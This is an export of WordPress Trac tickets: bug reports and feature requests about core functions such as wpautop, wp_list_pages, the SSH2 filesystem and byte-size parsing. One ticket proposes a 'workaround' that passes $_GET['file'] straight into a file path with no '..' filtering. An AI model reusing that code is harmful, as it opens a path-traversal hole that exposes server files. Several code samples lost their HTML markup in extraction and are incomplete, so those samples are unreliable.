__group__ ticket summary owner component _version priority severity milestone type _status workflow _created modified _description _reporter Future Releases 18525 "zlib.output_compression ""on"" in server conflicts with autoupdate" Bootstrap/Load 3.2.1 normal normal Awaiting Review defect (bug) reopened dev-feedback 2011-08-26T20:11:45Z 2024-02-07T18:30:58Z "If zlib.output_compression is ""on"" in server (my vps server), then auto-update works, but without verbose output or any indication that install has succeeded. This error is consistent for all auto-updates WordPress Application and all plugins. It is NOT a plugin conflict. Occurs on different servers. Testing has confirmed that when zlib.output_compression is returned to ""off"", then updates work as expected. In my opinion this is a minor bug and probably a note in the readme file will suffice. Thank You, Neil Miller zx@avidre.net" avidre Future Releases 24142 Zero value for posts_per_page value in wp_query custom instance and for 'Blog pages show at most' option SergeyBiryukov Query normal normal Future Release defect (bug) reviewing dev-feedback 2013-04-20T09:04:16Z 2024-02-18T16:12:32Z "To show no posts if the posts_per_page value is 0. Currently for custom instances of wp_query, if the value is 0 then this is changed with the value from posts_per_page option from the database. ""get_options( 'posts_per_page' )"" For home page if we set value 0 on the settings page, in wp-admin/options-reading.php, after the saves are changed, this value is changed to 1. I think for both cases if the posts per page value is 0 then no posts should not display. " alexvorn2 Future Releases 49599 Wrong PHPDoc wp_get_active_and_valid_plugins Plugins 5.3.2 normal normal Awaiting Review defect (bug) new dev-feedback 2020-03-08T14:08:07Z 2022-02-13T17:22:28Z "I found a misleading error in the documentation of wp_get_active_and_valid_plugins (in wp-includes/load.php): {{{#!php Privacy. 2. Keep 'Change your Privacy Policy page' dropdown unselected. 3. Save settings by clicking on 'Use This Page' button. **Expected Result:** As there is no page selected in dropdown, it should not show the notice that page has been updated. [[Image(https://ibb.co/3hyK6BY)]] **Environment Details:** WordPress version: 6.3.1 Browser: Chrome Version 116.0.5845.111 OS version: Windows 10 PHP version: 7.4.33 Server: Apache/2.4.57 Active Theme: Twenty Twenty-Three Active Plugins: None " anveshika Future Releases 42637 Wrong button text for plugin installation failed! Plugins normal normal Awaiting Review defect (bug) new close 2017-11-20T07:42:07Z 2022-02-10T01:08:13Z "Button text should be `Installation Failed!` instead of `Update Failed!` if plugin installation failed. Check below gif: Latest version: http://bsf.io/yola3 After applied patch: http://bsf.io/rblas" Mahesh901122 Future Releases 20019 wpmu_validate_blog_signup(): Allow '.' and '-' in blog names Login and Registration 3.0 normal normal enhancement reopened dev-feedback 2012-02-10T23:04:29Z 2019-06-04T20:03:10Z "Canonical uses Wordpress 3.x multisite as part of voices.canonical.com, for employees who do not have or wish to list their personal blog. The code is stock, except for one patch we maintain, which allows blog names (currently in WP as lowercase alphanumeric only) to also include '.' and '-'. This matches our global username format. Attached is a patch extending wpmu_validate_blog_signup() to allow '.' and '-', with a tweak for the error text. We have been running the patch for awhile, and have not run across any problems with the rest of the code accepting this." fo0bar Future Releases 31166 wpmu_signup_user_notification filter is incorrect Login and Registration 3.0 normal normal defect (bug) new dev-feedback 2015-01-28T20:30:03Z 2019-06-04T20:10:50Z "Simple ticket here, The wpmu_signup_user_notification filter seems to be filtering the wrong option {{{ if ( ! apply_filters( 'wpmu_signup_user_notification', $user, $user_email, $key, $meta ) ) return false; }}} If I'm thinking correctly, the filter should be filtering a boolean. If two filters are added to this and the first returns false, there is no way for the second filter to recover the $user variable. This is how I see it working WP4.1, /wp-includes/ms-functions.php line 919 {{{ if ( ! apply_filters( 'wpmu_signup_user_notification', true, $user, $user_email, $key, $meta ) ) return false; }}}" johnrom Future Releases 12756 WPMU does not handle files with two or more dots in the filename wpmuguru Upload 2.9.2 normal minor Future Release defect (bug) reopened close 2010-03-29T07:23:50Z 2022-10-14T18:47:54Z "* WPMU does download images that have two or more dots in the file name > E.g., One..jpg One...jpg One....jpg rewrites do work (checked) * this is clearly a WP issue: > /wp-content/blogs.php ... $file = BLOGUPLOADDIR . str_replace( '..', '', $_GET[ 'file' ] ); if ( !is_file( $file ) ) { status_header( 404 ); die('404 — File not found.'); } ... > WPMU removes two dots!!! > workaround: $file = BLOGUPLOADDIR . $_GET[ 'file' ]; // name.ly: workaround for files with two or more dots tested and works fine " Namely Future Releases 28530 WPMU Creating new user does not use welcome notification template Networks and Sites normal normal defect (bug) reopened dev-feedback 2014-06-13T16:36:27Z 2019-06-04T20:08:14Z "In a multisite setting adding a new user to the network should send a welcome notification to the user with a template defined in '''Settings > 'Welcome User Email''''. But the template is not used. When creating a new user via {{{/network/user-new.php}}} the method {{{wp_new_user_notification}}} gets called. Instead {{{wpmu_welcome_user_notification}}} should get called." jokr Future Releases 12257 wpdb Scales Badly Due to Unnecessary Copies of All Query Results Database normal critical defect (bug) assigned dev-feedback 2010-02-17T03:08:06Z 2019-06-04T19:21:45Z "While working on #11726, I encountered a reproducible crash in wpdb::query() The following code causes memory exhaustion on large result sets: {{{ while ( $row = @mysql_fetch_object($this->result) ) { $this->last_result[$num_rows] = $row; $num_rows++; } }}} The memory exhaustion message is error-controlled, causing a white screen of death even in debug mode. I searched wp-db.php for references to $this->last_result, and I found no justification for these object reference copies. $this->last_result '''should''' be maintained as a MySQL resource and properly optimized using the MySQL client layer instead of this PHP nonsense. Tagging for dev-feedback to discuss which Milestone is appropriate." miqrogroove Future Releases 11678 wpautop() fails on uppercase closing tags Formatting 2.9 normal normal defect (bug) new dev-feedback 2009-12-31T11:26:11Z 2019-06-04T19:42:47Z "To reproduce, in a post enter: {{{

Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!

}}} View the post (source) and you get: {{{

Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!

}}} Because I (incorrectly) entered an uppercase closing

tag, wpautop() thinks there is no closing tag so adds a

, which then often renders as a double

tag. Close if this is not a bug, though I thought it may be good to do some sanitizing or something on uppercase tags. " joehoyle Future Releases 2833 wpautop breaks style and script tags Formatting 2.0.3 low normal Future Release defect (bug) reopened dev-feedback 2006-06-17T20:36:00Z 2022-03-29T01:38:54Z "When I create a post in which I want to include Javascript or some styles, WordPress 'breaks'when showing those posts, because all newlines in the SCRIPT and STYLE tag are converted into BR tags. Example: {{{ }}} Becomes: {{{
}}} And: {{{ }}} Becomes {{{
}}} This happens because wpautop adds those BR tags to the post. (As it should, just not within STYLE or SCRIPT tags.) I've made a (temporary?) workaround for this by creating a pre and post event for wpautop, which substitute the necessary newlines by a temporary value in the pre event and placing them back in the post event. Although I think this should be incorporated in wpautop itself. See also: http://wordpress.org/support/topic/76433 and http://wordpress.org/support/topic/76297 While searching trac I also found ticket #2346, which is about the same problem, but which was for 2.0 and self-closed by the submitter? P.S. I have TinyMCE turned of." Nazgul Future Releases 40676 wpautop adds opening & closing p tags around the opening a tag and around the closing a tag when the link contains certain flow content elements like div, h1, h2... Formatting 4.8 normal normal Awaiting Review defect (bug) new needs-unit-tests 2017-05-05T10:55:47Z 2017-07-21T11:02:23Z "Hi, == Description == wpautop leaves {{{}}} (opening tag of the link) in between {{{

}}} tags and {{{}}} (closing tag of the link) in between {{{

}}} tags when the link contains certain flow content elements like div, h1, h2... == Example 1 == If I add this to the HTML editor: {{{
DIV inside link
}}} The output source code is: {{{

DIV inside link

}}} ---- == Example 2 == If I add this to the HTML editor: {{{

H1 inside link

}}} The output source code is: {{{

H1 inside link

}}} ---- == Note 1 == I would like to point out that html '''''flow content'' elements such as {{{
}}} or headings ({{{

,

,

}}} ,...) belong to the category of permitted content for the {{{}}} element'''. References: [https://html.spec.whatwg.org/multipage/semantics.html#the-a-element WHATWG HTML Living Standard |The definition of a] [http://www.w3.org/TR/html5/text-level-semantics.html#the-a-element HTML5 | The definition of a] [https://developer.mozilla.org/en/docs/Web/HTML/Element/a MDN | The definition of a.] ---- == Note 2 == This issue might be related to ticket #34722" diegocanal Future Releases 56025 wp_validate_boolean() not doing what it describes, causes issues with [video] shortcode General 6.0 normal normal Awaiting Review defect (bug) new dev-feedback 2022-06-21T08:51:00Z 2022-06-22T13:52:45Z " == The function in question: {{{ /** * Filter/validate a variable as a boolean. * * Alternative to `filter_var( $var, FILTER_VALIDATE_BOOLEAN )`. * * @since 4.0.0 * * @param mixed $var Boolean value to validate. * @return bool Whether the value is validated. */ function wp_validate_boolean( $var ) { if ( is_bool( $var ) ) { return $var; } if ( is_string( $var ) && 'false' === strtolower( $var ) ) { return false; } return (bool) $var; } }}} == Steps to recreate the issue: Add the following shortcodes to a page: {{{ [video src=""YOUR-SOURCE-HERE""] [video src=""YOUR-SOURCE-HERE"" loop=""off""] [video src=""YOUR-SOURCE-HERE"" loop=""0""] [video src=""YOUR-SOURCE-HERE"" loop=""false""] }}} - The first shortcode works as intended, rendering a video on the frontend without the loop attribute. - The second shortcode's '; default: return 'no value'; } } public function column_title( $item ) { $post_id = get_the_ID(); $action = array( 'edit' => sprintf( 'Add Question', $post_id, 'edit', 'add_question', $item['id'], $post_id ), ); return sprintf( '%1$s %2$s', $item['title'], $this->row_actions( $action ) ); } function column_cb( $item ) { return sprintf( '', $item['id'] ); } function no_items() { esc_html_e( 'No Questions Found.', 'conditional-shortcode' ); } public function process_bulk_action() { // security check! if ( isset( $_POST['_wpnonce'] ) && ! empty( $_POST['_wpnonce'] ) ) { $nonce = filter_input( INPUT_POST, '_wpnonce', FILTER_SANITIZE_STRING ); $action = 'bulk-' . $this->_args['plural']; if ( ! wp_verify_nonce( $nonce, $action ) ) { wp_die( 'Nope! Security check failed!' ); } } $action = $this->current_action(); switch ( $action ) { case 'delete_questions': wp_die( 'Delete something' ); break; case 'add_questions': wp_die( 'Save something' ); break; default: // do nothing or something else return; break; } wp_redirect( esc_url( add_query_arg() ) ); exit; return; } } /** * Shows the List table for all questions. * * @return void */ function conditional_shortcode_questions_list_table_layout() { $table = new Class_Conditional_Shortcode_Questions_Listing(); printf( '

%s

', __( '', 'conditional-shortcode' ) ); echo '
'; $page = filter_input( INPUT_GET, 'page', FILTER_SANITIZE_STRIPPED ); $paged = filter_input( INPUT_GET, 'paged', FILTER_SANITIZE_NUMBER_INT ); printf( '', $page ); printf( '', $paged ); $table->prepare_items(); // this will prepare the items AND process the bulk actions $table->search_box( __( 'Search question by id' ), 'conditional-shortcode' ); // Needs To be called after $myRequestTable->prepare_items() $table->display(); echo '
'; echo '
'; } conditional_shortcode_questions_list_table_layout(); }}} I was able to resolve this issue by changing the value of name attribute of bulk actions select field. Like from name to names. What I think the issue could be is when here the name=""action"" for this select and it has some value xyz on the other side WordPress save post looks for action to be equal to edit. Can we provide a way of changing this name attributes value either by providing a filter or by changing it. But I think changing name attribute would require a lot of other code changes so its better to provide a filter for custom use. Or add a comment on top so someone else using WP LIST Table in a metabox must override this function with custom value to name attribute. For clarity I changed This echo '\n""; Thanks! " muhammadfaizanhaidar Future Releases 41714 "wp_list_pages() - horrible performance due to eventual ""SELECT *""" Posts, Post Types 4.9 normal normal Awaiting Review defect (bug) new dev-feedback 2017-08-23T16:15:00Z 2023-07-06T14:29:05Z "I'm investigating awful performance (MySQL slow queries logged constantly) a site which uses a plugin to display a page list. The plugin calls wp_list_pages(). wp_list_pages() in turn calls get_posts(). And get_posts() ends up making the slow query: {{{ SELECT * FROM wp_posts WHERE (post_type = ‘page’ AND post_status = ‘publish’) ORDER BY wp_posts.post_date ASC; }}} So, all the post_content fields (along with everything else) are being requested, just for the purposes of constructing a page list. (The site has ~ 1200 pages - and the above call returns 34MB from the MySQL server). It looks like either get_posts() needs some more flexibility so that it has an option to return only specified fields." DavidAnderson Future Releases 41760 wp_list_comments callback params Comments normal normal Awaiting Review enhancement new dev-feedback 2017-08-30T18:44:15Z 2017-08-31T09:05:53Z "In `wp-includes/class-walker-comment.php`, methods `comment()` and `html5_comment()` have following order of @params: `$comment, $depth, $args`. However, when you try to modify comment markup using `callback` argument for `wp_list_comments()`, order of params is `$comment, $args, $depth`. Is it possible to make the same order of params?" milana_cap Future Releases 23498 wp_list_authors ignores 'exclude_admin' arg when admin account has a display_name other then 'admin' SergeyBiryukov Users 3.1 normal normal Future Release defect (bug) reviewing dev-feedback 2013-02-18T09:37:59Z 2023-12-15T00:50:09Z "Line 293 of author-template.php should be changed from: {{{ if ( $exclude_admin && 'admin' == $author->display_name ) }}} to: {{{ if ( $exclude_admin && 'admin' == $author->user_login ) }}} Thanks." raphaabreu Future Releases 39787 wp_list_authors can be optimize Users 4.8 normal normal Awaiting Review enhancement new dev-feedback 2017-02-05T01:52:55Z 2024-01-26T07:47:14Z "May be i don't understand but look at this line https://core.trac.wordpress.org/browser/tags/4.7/src/wp-includes/author-template.php#L392 {{{#!php 392 $author = get_userdata( $author_id ); }}} Why we should call `get_userdata()`? At top we call `$authors = get_users( $query_args );` and can return display_name and user_nicename in next foreach section without `get_userdata()`. And will be nice add filter by role. Because wp_list_authors means authors not subscribers or editors. " alexufo Future Releases 24705 wp_link_pages() does not showing active current element Posts, Post Types 2.2 normal major Awaiting Review enhancement new dev-feedback 2013-07-07T22:19:44Z 2018-12-09T22:00:39Z "By full analogy of all wp functions, wp_link_pages must generate active class element too. {{{ 1 2 3 4 }}} but should be {{{ 1 2 3 4 }}} " Alexufo Future Releases 27683 wp_insert_post_empty_content filter issues with auto-drafts and/or fix auto-draft duplicates Posts, Post Types 3.5.1 normal normal defect (bug) new dev-feedback 2014-04-05T07:15:22Z 2019-06-04T20:46:27Z "I have explained the issue at http://wordpress.stackexchange.com/a/140326/31794 The 'wp_insert_post_empty_content' filter can have adverse effects on getting the draft for New Posts (new-post.php) resulting in numerous PHP Noticesand failure to get the auto-draft record properly. My suggestion for an intermediate fix would be to replace: {{{ if ( apply_filters( 'wp_insert_post_empty_content', $maybe_empty, $postarr ) ) { if ( $wp_error ) return new WP_Error( 'empty_content', __( 'Content, title, and excerpt are empty.' ) ); else return 0; } }}} with: {{{ if ( $id = apply_filters( 'wp_insert_post_empty_content', $maybe_empty, $postarr ) ) { if ( $wp_error ) return new WP_Error( 'empty_content', __( 'Content, title, and excerpt are empty.' ) ); else return $id; } }}} That way we can use the filter to prevent duplicates instead of having to resort to extending the db class. Though ideally a native method to prevent auto-draft duplicates (along the same lines of my code) in wp_insert_post seems best. I don't know who came up with the cleanup later idea, but it's far from an ideal practice, and as per previous tickets, doesn't always work." hexalys Future Releases 44595 wp_insert_post() inserts wrong GUID (adds http:// prefix) General normal normal Awaiting Review defect (bug) new dev-feedback 2018-07-17T14:07:48Z 2018-07-17T19:36:41Z "I manually set a GUID to e.g. `abc123` before calling `wp_insert_post()` and it was inserted as `http://abc123` to the database. Expected: `abc123`" Looimaster Future Releases 23424 WP_Image class for handling images from the media library Media 3.5 normal normal enhancement new dev-feedback 2013-02-08T15:41:24Z 2019-06-04T20:04:57Z "Since 3.5 we have the class WP_Image_Editor. This needs a file path to be able to manipulate an image. Currently you would have to use something like wp_get_image_editor( _load_image_to_edit_path( $post_id ) ). What is wrong since you are using a ""private"" function. Currently I'm working on this idea and you can find the code here https://github.com/markoheijnen/WP_Image/blob/master/wp-image.php. What it does now is getting the filepath, be able to get the image editor, add an image size on the fly and getting/updating the metadata. We really miss something like a WP_Image class in WordPress. However I'm not sure what kind of functionality is needed for it. I like the current class mainly because it gives you the power to create an image size for a specific media image and stores it in the sizes array. When a user removes the media image then also the custom sizes will be removed." markoheijnen Future Releases 38481 wp_handle_upload_prefilter not used before deriving attachment title Upload 4.6.1 normal normal Awaiting Review enhancement new dev-feedback 2016-10-25T08:30:18Z 2019-03-26T21:28:44Z "I created a module that modifies upload behavior. I use the wp_handle_upload_prefilter to alter the $_FILES data - specifically the 'name' property of the uploaded file. This works well for changing the name of the file being stored in the file system, but the title of the attachment post still accesses the $_FILES['async-upload']['name'] on line 281 of media.php. To be able to override the title, I had to hook into the 'sanitize_title' filter on line 293 of media.php - and doing that is, in my book, a hack. This sanitize_title filter should specify a context." frodeborli Future Releases 39926 wp_get_object_terms should return WP_Error on wrong fields argument or use a sane default Taxonomy normal normal Awaiting Review defect (bug) new dev-feedback 2017-02-21T13:40:52Z 2017-04-14T09:44:53Z "wp_get_object_terms( $object_ids, $taxonomies, $args ) accepts object_ids, taxonomies and as last option extra arguments as an array. One of the extra arguments in the $args array is the fields option. I used the field value 'term_id' (erroneously) assuming this would return the term_ids. However this did not work. wp_get_object_terms returned an empty array and in my error log I noticed this SQL error message: {{{ WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'FROM wp_terms AS t INNER JOIN wp_term_taxonomy AS tt ON t.term_id = tt.term_id ' at line 1 for query SELECT FROM wp_terms AS t INNER JOIN wp_term_taxonomy AS tt ON t.term_id = tt.term_id INNER JOIN wp_term_relationships AS tr ON tr.term_taxonomy_id = tt.term_taxonomy_id WHERE tt.taxonomy IN ('product') AND tr.object_id IN (449, 427) ORDER BY t.name ASC }}} After consulting the source of the wp_get_object_terms I noticed that 'term_id' is not a valid fields value. However I would have expected wp_get_object_terms() to return a WP_Error object instead of creating erroneous SQL code. The following are valid field option values: * all - Default : all matching term's objects will be returned * ids : term's ids will be returned * names : term's names will be returned * slugs : term's slugs will be returned * all_with_object_id : all matching term's objects will be returned * tt_ids : term's taxonomy's ids will be returned [https://codex.wordpress.org/Function_Reference/wp_get_object_terms See wp_get_object_terms() docs on the Codex] === Proposed solution Due to [https://core.trac.wordpress.org/browser/trunk/src/wp-includes/class-wp-term-query.php#L581 this switch statement] invalid or an empty fields value will result in an empty SELECT SQL query in this [https://core.trac.wordpress.org/browser/trunk/src/wp-includes/class-wp-term-query.php#L650 codeblock] My proposal is to add a default clause to the [https://core.trac.wordpress.org/browser/trunk/src/wp-includes/class-wp-term-query.php#L581 switch statement] which defaults to using the 'all' case value. This seems to adhere to the functionality as well as the spirit of the rest of the WP_Term_Query class code. As far as I know it should be backwards compatible as well. " BjornW Future Releases 38906 wp_get_attachment_image_src() sometimes gives incorrect width and height values Media normal normal Future Release defect (bug) reopened dev-feedback 2016-11-22T18:57:34Z 2022-12-21T20:11:42Z "The following is an example of a problem that happens to me regularly across multiple sites. I have an image size registered as follows: {{{#!php add_image_size( 'featured-home', 1600, 600, true ); // width, height, crop }}} When I run wp_get_attachment_image_src() as follows: {{{#!php $image = wp_get_attachment_image_src( $post_id, 'featured-home' ); }}} ...and then print_r() the result, I get this: {{{#!php Array ( [0] => http://localhost:8080/lacoastalservices/wp-content/uploads/2016/09/wetlands-1600x600.jpg [1] => 1080 [2] => 405 [3] => 1 ) }}} The image itself is actually 1600 by 600 pixels wide, but for some reason the width and height values given in the array are ""scaled down"" to the width of the next largest image size on the site (1080px), and the corresponding image height if it were actually that wide (405px). Note that WordPress's ""large"" default image size is still at its default of 1024px, so I don't think that's the problem. You can hopefully reproduce this by running the ""Display All Image Sizes"" plugin on a few sites and looking for images whose larger image sizes have a mismatch between their identified dimensions and their actual urls. ""Display All Image Sizes"" is using wp_get_attachment_image_src() to generate the text strings that describe image sizes, which is how I became aware of this bug." pressupinc Future Releases 54488 wp_filter_nohtml_kses does not remove HTML comments audrasjb Formatting 2.1 normal normal Future Release defect (bug) assigned changes-requested 2021-11-22T09:42:10Z 2023-10-12T06:51:06Z "The documentation states that `wp_filter_nohtml_kses()` ""Strips all HTML from a text string."" However, in reality, HTML comments are preserved. This seems to be an explicit choice (wp_kses_split2() - L1083 of wp-includes/kses.php but seems at odds with the documentation, and also with the expectations of a function named ""nohtml"". Expected behaviour {{{ wp> wp_filter_nohtml_kses('This is not a comment'); => string(21) ""This is not a comment"" }}} Actual behaviour {{{ wp> wp_filter_nohtml_kses('This is not a comment'); => string(37) ""This is not a comment"" }}} " leewillis77 Future Releases 58541 WP_Filesystem_SSH2:put_contents (and others) does not check for $sftp_link to be up Filesystem API normal major Future Release defect (bug) new changes-requested 2023-06-15T06:47:39Z 2023-10-27T14:18:47Z "This is a bit long, as I need to explain the reason why it is a problem not to check for the link '$sftp_link' to be up. In short: WordPress allows choosing between various FS_METHODS (wp-config.php), e.g. 'direct' or 'ssh2'. While neither choice will affect WordPress updating itself at all, it has implications when some plugins updating files writing content to a file (htaccess, css etc) via {{{ $wp_filesystem->put_contents($file, $content); }}} The function put_contents should check whether the link is up. There is a big difference how one needs to setup the '$wp_filesystem' instance if you use 'direct' or 'ssh2' - the first one does not need to connect, the second needs to setup a connection before being able to write. For FS_METHODS 'direct': {{{ global $wp_filesystem; if(empty($wp_filesystem)) { require_once ABSPATH . '/wp-admin/includes/file.php'; WP_Filesystem(); } $wp_filesystem->put_contents($file, $content); }}} For FS_METHODS 'ssh2': {{{ global $wp_filesystem; if(empty($wp_filesystem)) { require_once ABSPATH . '/wp-admin/includes/file.php'; WP_Filesystem(); // this is the ONLY difference to 'direct' $wp_filesystem->connect(); } $wp_filesystem->put_contents($file, $content); }}} In the file ABSPATH/wp-admin/includes/file.php (around line 2051) the function WP_Filesystem() simply sets up an instance of the class defined by FS_METHOD, but does NOT connect if FS_METHOD is set to 'ssh2'. Now many plugins that need to write a file (css,htacess,etc) simply assume that FS_METHOD is set to 'direct' or even assume WP_Filesystem() will connect as well. I have three plugins (there are more, but these are the ones I am 100% sure) that have problems writing - Ultimate Addons for Elementor - Astra Addons - Sensei Now I could tell those developers to do it properly. However I think the function $wp_filesystem->put_contents() should CHECK whether the link is up and if NOT, call a function within the class and setup the link to the server, after all I would consider this is proper coding pratice. {{{ public function put_contents( $file, $contents, $mode = false ) { // so this is for people who come from the outside // just setting up the class and dont care whether // a call to ""connect"" is required. error_log(""class-wp-filesystem-ssh2.php -> put_contents -> $file ""); if(!$this->sftp_link) { error_log(""class-wp-filesystem-ssh2.php link is null, connecting ....""); // this function is similar to connect $rc = $this->build_options_connect(); } // put the contents $ret = file_put_contents( $this->sftp_path( $file ), $contents ); if ( strlen( $contents ) !== $ret ) { return false; } $this->chmod( $file, $mode ); return true; } }}} The function $this->build_options_connect() sets up the required data structure similar to the function ""request_filesystem_credentials()"" in file ABSPATH/wp-admin/includes/file.php (around line 2250) and then sets up the connection similar to the function $wp_filesystem->connect() in file ABSPATH/wp-admin/includes/class-wp-filesystem-ssh2.php (around line 120). I have done this on all of my servers for a few weeks now. Message like this one example (of many) below have completely disappeared. {{{ [10-Jun-2023 18:25:12 UTC] PHP Warning: file_put_contents(ssh2.sftp:///HIDDEN/htdocs/wp-content/uploads/uael_uploads/.htaccess): failed to open stream: operation failed in /HIDDEN/htdocs/wp-admin/includes/class-wp-filesystem-ssh2.php on line 283 }}} While I stated 'has patch' (I do), let's first see what people say about this." jobst Future Releases 17857 WP_Embed - Split shortcode() function into two for increased flexibility Media 2.9 normal normal enhancement new dev-feedback 2011-06-21T01:52:41Z 2019-06-04T20:02:44Z "Currently, the WP_Embed class is restricted to posts; it takes a post ID as a parameter and checks the post meta table. What I'd like to propose is to apply a filter to the post ID and split WP_Embed::shortcode() into two functions (at http://core.trac.wordpress.org/browser/trunk/wp-includes/media.php#L1177). In a nutshell, let the link parsing be one function and if the link is oEmbed-worthy send it to the second function for parsing. The second function could then be easily extended for usage in 3rd-party plugins not using WP posts (like BuddyPress). Also, the patch checks the URL against each registered WP oEmbed provider's URL scheme if oEmbed discovery is false. This is designed to prevent unnecessary external pinging of an oEmbed provider and avertible meta caching for failed attempts. Andy Peatling primarily wrote this part of the code, which he sent to me awhile ago. Attached patch is against r18324." r-a-y Future Releases 38618 wp_description() and description-tag General normal normal Awaiting Review feature request new dev-feedback 2016-11-02T10:00:21Z 2019-04-05T11:03:42Z "The `wp_title()` function is used by the `title-tag` theme feature to output specific page titles. Ref https://developer.wordpress.org/reference/functions/wp_title/ What are your thoughts on having something like this for the meta description?" henry.wright Future Releases 43672 wp_delete_post() function ignores `$force_delete` parameter for custom post types Posts, Post Types normal normal Awaiting Review defect (bug) new dev-feedback 2018-04-02T05:23:01Z 2023-07-05T15:55:14Z "The `wp_delete_post()` function has a second optional parameter called `$force_delete` (default false) that decides whether to send the post to trash or delete it permanently. But when the function is invoked with a post id that belongs to a custom post type, this parameter is ignored and the post is always deleted permanently and never sent to trash. Here is the relevant code inside that function that does this. {{{ if ( ! $force_delete && ( 'post' === $post->post_type || 'page' === $post->post_type ) && 'trash' !== get_post_status( $postid ) && EMPTY_TRASH_DAYS ) { return wp_trash_post( $postid ); } }}} I think the post types check in the above condition should not be made, but I am not sure why it is there and what are the implications of it. Steps to replicate this issue. - Create a post in a custom post type and note the post id. - Make the call to the function. Assuming 42 is the post id, the call will be `wp_delete_post( 42, false)` - Since the `$force_delete` parameter is set to `false`, the expectation is that the post should be sent to trash - But the post will be permanently deleted If it is agreed that it is a bug, then I can submit a patch to remove the post type check. " sudar Future Releases 47868 wp_delete_attachment returning successfully, deleting all DB data, but NOT deleting files, and NOT returning false Media normal normal Awaiting Review defect (bug) new dev-feedback 2019-08-13T12:03:06Z 2019-08-20T04:16:29Z "from https://wordpress.stackexchange.com/questions/344976/wp-delete-attachment-returning-successfully-deleting-all-db-data-but-not-delet?noredirect=1#comment505976_344976 I digged into wp_delete_attachment here https://core.trac.wordpress.org/browser/tags/5.2.1/src/wp-includes/post.php#L5450 , it calls wp_delete_attachment_files wp_delete_attachment_files returns false on failure, but this is ignored! in wp_delete_attachment. Now I'm not gonna go on a rant how bad that 'design' is. My question is, how can I make sure that the files DO get deleted? I'm calling {{{ $attachments = get_attached_media('', $post->ID); foreach ($attachments as $attachment) { wp_delete_attachment($attachment->ID, true); wp_delete_attachment never returns falsy. }}} How can I figure out and fix wp_delete_attachment ? in my case it seems that some post_meta might be damaged, as the file location sometimes can be lost for some reason. This should return false or better throw and error" Jossnaz Future Releases 55635 "wp_convert_hr_to_bytes() report correct byte sizes for php.ini ""shorthand"" values" Upload normal normal Awaiting Review defect (bug) new changes-requested 2022-04-27T21:43:16Z 2022-09-14T23:16:00Z "Resolves #17725 When `wp_convert_hr_to_bytes()` was introduced in [4388] it provided a simplified mechanism to parse the values returned by functions like `ini_get()` which represent byte sizes. The over-simplified approach has led to issues in that function reporting the wrong byte sizes for various php.ini directives, leading to confusing problems such as uploading files that are rejected improperly or accepted improperly. In this patch we're porting the parser from PHP's own source (which has remained stable for decades and probably can't change without major breakage) in order to more accurately reflect the values it uses when it reads those configurations. Unfortunately PHP doesn't offer a mechanism to read its own internal value for these fields and a 100% port is extremely cumbersome (at best) due to the different ways that PHP and C handle signed integer overflow. These differences should only appear when supplying discouraged/invalid values to the system anyway, and PHP warns that in these situations things are likely to break anyway. Over the years this function has been modified a couple of times in ways that this patch reverts: - [38013] introduced a `PHP_INT_MAX` limit in a way that coerces hexadecimal and octal integer representations to decimal. - [35325] replaced the hard-coded byte size with overwritable constants but if there were any occasion for someone to change those constants in `wp-config.php` then we would actually want to preserve the hard-coded values in `wp_convert_hr_to_bytes()` since that function refers to code inside of PHP, not inside of WordPress. - The original code from [4388] looks for the presence of the suffixes //anywhere// within the value string and prioritizes `g` over `m` over `k` whereas PHP only looks at the last character in the input string (this is something that [https://core.trac.wordpress.org/attachment/ticket/17725/17725.3.diff 17725.3.diff] got right). This can cause unexpected parses, such as with `14gmk` when WordPress interprets it as 14GiB but PHP interprets it as 14KiB. Further we do acknowledge the mismatch between PHP's definition of ""gigabyte""/""megabyte""/""kilobyte"" being factors of 1024 apart from each other and the standard of being 1000. WordPress follows PHP's convention so this is simply noted in the function and preserved. This patch introduces new behaviors which might seem unexpected or wrong. It's important to consider that this function exists because PHP doesn't expose the values it parses from the php.ini directives. Therefore it's job in WordPress can be considered to do as best as it can to represent what's really happening inside of PHP; this may not match our intuition about what PHP should be doing. To that end the over-simplified code for the past 16 years has misreported many plausible-looking values like `100MB` (which PHP interprets as 100 bytes but WordPress thinks is 100 MiB). **Testing** In order to fully verify the updated code we have to understand PHP's interpretation of the php.ini directive values. One way to do this is to set a value, `upload_max_size` for instance, in any number of the possible configurable places and then make repeated uploads to see if it's rightfully accepted or rejected. This is cumbersome. An alternative approach is to compile PHP locally with added instrumentation; this is the approach taken in preparing this PR. The following patch will report three values every time a ""Long"" value is parsed from a php.ini directive: the shorthand value being parsed, the bound `long` value before applying the magnitude suffix, and the possibly-overflowed value derived from applying the possible `g`, `m`, and `k` suffixes. {{{#!diff diff --git a/Zend/zend_operators.c b/Zend/zend_operators.c index 8a0cc813..362cef76 100644 --- a/Zend/zend_operators.c +++ b/Zend/zend_operators.c @@ -164,6 +164,9 @@ ZEND_API zend_long ZEND_FASTCALL zend_atol(const char *str, size_t str_len) /* { break; } } + + printf(""zend_atol( \""%s\"" ) = %lld : %lld\n"", str, ZEND_STRTOL(str, NULL, 0), retval); + return (zend_long) retval; } /* }}} */ }}} For example, a sampling of values run through PHP produces this output. {{{#!bash zend_atol( ""0"" ) = 0 : 0 zend_atol( ""0g"" ) = 0 : 0 zend_atol( ""1g"" ) = 1 : 1073741824 zend_atol( ""3G"" ) = 3 : 3221225472 zend_atol( ""3mg"" ) = 3 : 3221225472 zend_atol( ""3km"" ) = 3 : 3145728 zend_atol( ""boat"" ) = 0 : 0 zend_atol( ""-14k"" ) = -14 : -14336 zend_atol( ""-14chairsg"" ) = -14 : -15032385536 zend_atol( ""9223372036854775807"" ) = 9223372036854775807 : 9223372036854775807 zend_atol( ""9223372036854775807g"" ) = 9223372036854775807 : -1073741824 zend_atol( ""9223372036854775808"" ) = 9223372036854775807 : 9223372036854775807 zend_atol( ""0xt"" ) = 0 : 0 zend_atol( ""0x5teak_and_egg"" ) = 5 : 5368709120 }}}" dmsnell Future Releases 50538 WP_Comments_List_Table should not show views that have a count of 0 pbiron Comments normal normal Awaiting Review enhancement assigned dev-feedback 2020-07-02T17:14:28Z 2021-03-12T11:00:37Z "Other core list tables that have a get_views() method do not output a view if the count for that view is 0, e.g., `WP_Posts_List_Table` doesn't output ""Pending (0)"" if there are no posts with $post_status === 'pending'). However, `WP_Comments_List_Table` does output ""Pending (0)"" if there are no pending comments. For consistency's sake, I think `WP_Comments_List_Table` should skip views with count of 0. Related: #47495" pbiron Future Releases 